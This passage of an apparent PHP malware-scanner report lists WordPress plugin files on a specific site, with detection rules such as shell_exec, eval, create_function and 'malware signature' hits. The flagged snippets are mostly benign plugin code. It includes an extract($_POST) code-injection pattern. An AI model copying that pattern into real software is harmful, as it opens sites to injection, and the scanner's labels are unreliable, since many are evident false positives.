#007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$decimals&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$sz&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'BKMGTP'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$factor&nbsp;</span><span style="color: #007700">=&nbsp;(int)&nbsp;</span><span style="color: #0000BB">floor</span><span style="color: #007700">((</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)&nbsp;/&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(</span><span style="color: #DD0000">"%.</span><span style="color: #007700">{</span><span style="color: #0000BB">$decimals</span><span style="color: #007700">}</span><span style="color: #DD0000">f"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$bytes&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">pow</span><span style="color: #007700">(</span><span style="color: #0000BB">1024</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$factor</span><span style="color: #007700">))&nbsp;.&nbsp;(isset(</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">])&nbsp;?&nbsp;</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">]&nbsp;:&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_get_remote_image_ext'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_get_remote_image_ext</span><span style="color: #007700">(</span><span style="color: #0000BB">$fil</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_166").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/actions/wp_ajax_import_failed.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 799.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_167" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit extract_global <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">extract</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_167").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/controllers/controller/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_168" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$str'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"http://"&nbsp;==&nbsp;$str&nbsp;||&nbsp;"ftp://"&nbsp;==&nbsp;$str&nbsp;?&nbsp;""&nbsp;:&nbsp;$str;'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">input</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">addFilter</span><span style="color: #007700">(</span><span style="color: #0000BB">$filter</span><span style="color: #007700">);&nbsp;}&nbsp;global&nbsp;</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">is_a</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'WP_Styles'</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$wp_styles&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WP_Styles</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-ui'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/redmond/jquery-ui.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-tipsy'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/smoothness/jquery.tipsy.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi-admin-style'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/css/a...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_168").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/views/tools/diagnostics/inc.settings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_169" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_169").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_170" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_170").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_171" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_171").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_172" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_172").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_173" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_173").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/classes/Crypt/Base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 98.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_174" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(</span><span style="color: #DD0000">'m'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: 